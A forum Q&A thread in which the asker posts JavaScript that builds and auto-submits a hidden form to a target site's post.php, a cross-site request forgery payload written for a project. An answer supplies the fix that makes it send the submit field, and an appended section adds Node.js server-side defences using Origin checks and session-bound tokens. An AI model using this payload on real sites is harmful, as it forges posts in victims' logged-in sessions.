douxie0824 2014-11-21 03:17

Unable to set a submit-type input in a form created with JavaScript

I am working on a project where I have to carry out CSRF on a web page. So when the user is logged in and when he clicks on my webpage, I have to post with his username (derived from the cookie).

I tried creating my own form using the following code, so that when the user clicks my webpage, this form will post into post.php (target webpage)

<html>
<script language="javascript">

  function blah() {
    alert();
    var theForm, newInput1, newInput2, newInput3;
    var bla = "Aaada";
    var bla2 = "POST";
    // Start by creating a <form>
    theForm = document.createElement("form");
    theForm.action = "http://targeturl/post.php";
    theForm.method = "post";

    newInput1 = document.createElement("input");
    newInput1.type = "text";
    newInput1.name = "username";
    newInput1.value = bla;

    newInput2 = document.createElement("textarea");
    newInput2.name = "message";
    newInput2.value = bla;
    newInput2.id = "message";

    newInput3 = document.createElement("input");
    newInput3.type = "submit";
    newInput3.name = "post_submit";
    newInput3.value = bla2;
    newInput3.id = "post_submit";

    theForm.appendChild(newInput3);
    theForm.appendChild(newInput2);
    theForm.appendChild(newInput1);
    theForm.submit();
  }
  blah();
</script>
</html>

Title, Message and Submit button are the three inputs in the target form. When I try running this form, the submit button alone is not set. I am not able to understand why. I tried an actual form in HTML (with ) and posted it to the target URL, it works.

But since I have to be stealthy, I have to manually build the form, like the code I have posted. I tried all possibilities and I am not able to nail the actual reason why this variable is not setting.

PS:

 if (isset($_POST['post_submit'])) {

is the check in target page

and below is the target form:

<form method="post" action="post.php">
    Title: <input type="text" name="title" maxlength="50"/>
    <br />
    <br />
    Posting:
    <br />
    <br />
    <textarea name="message" cols="120" rows="10" id="message"></textarea>
    <br />
    <br />
    <input name="post_submit" type="submit" id="post_submit" value="POST" />
</form>

(It posts to itself, I have not included the remaining code of target)

Any help would be appreciated. Thanks


2 answers

  • doujiaoang69440 2014-11-21 03:30

    If you trigger the click event instead of the submit event, you'll get the submit button as well, so replace

    theForm.submit();
    

    with

    newInput3.click();
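
The target page in this thread acts on a request whenever `post_submit` is present, and every field name in that form can be supplied by another site. As an added example (not part of the original question or answer), the Node.js code below shows the server-side checks that make such a cross-site form fail: an `Origin` comparison and a token bound to the session. `checkPost`, `csrf_token`, `https://forum.example` and the request objects are hypothetical names and constructed data.

```javascript
// Server-side checks for a state-changing POST (hypothetical handler logic).
const crypto = require('node:crypto');

const SERVER_SECRET = crypto.randomBytes(32);    // per-deployment key (constructed)
const ALLOWED_ORIGIN = 'https://forum.example';  // assumed origin of the real site

// Token = HMAC(secret, sessionId); the real form carries it in a hidden field.
function issueCsrfToken(sessionId) {
  return crypto.createHmac('sha256', SERVER_SECRET).update(sessionId).digest('hex');
}

function tokenMatches(sessionId, supplied) {
  if (typeof supplied !== 'string') return false;
  const expected = Buffer.from(issueCsrfToken(sessionId), 'hex');
  const got = Buffer.from(supplied, 'hex');
  // timingSafeEqual throws on unequal lengths, so compare lengths first.
  return got.length === expected.length && crypto.timingSafeEqual(expected, got);
}

// req is a plain object: { headers: {origin}, sessionId, body: {field: value} }.
// The session cookie itself should also be set with SameSite=Lax or Strict.
function checkPost(req) {
  const origin = req.headers.origin;
  if (origin !== undefined && origin !== ALLOWED_ORIGIN) {
    return { ok: false, reason: 'cross-origin request' };
  }
  if (!tokenMatches(req.sessionId, req.body.csrf_token)) {
    return { ok: false, reason: 'missing or invalid CSRF token' };
  }
  return { ok: true, reason: 'accepted' };
}

// Constructed requests: the site's own form, and a cross-site form with the same fields.
const sid = 'session-1234';
const genuine = { headers: { origin: ALLOWED_ORIGIN }, sessionId: sid,
  body: { title: 't', message: 'm', post_submit: 'POST', csrf_token: issueCsrfToken(sid) } };
// The browser attaches the victim's cookie, but the sender cannot read the token.
const forged = { headers: { origin: 'https://other.example' }, sessionId: sid,
  body: { title: 't', message: 'm', post_submit: 'POST' } };
console.log('genuine:', checkPost(genuine));
console.log('forged: ', checkPost(forged));
```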
    
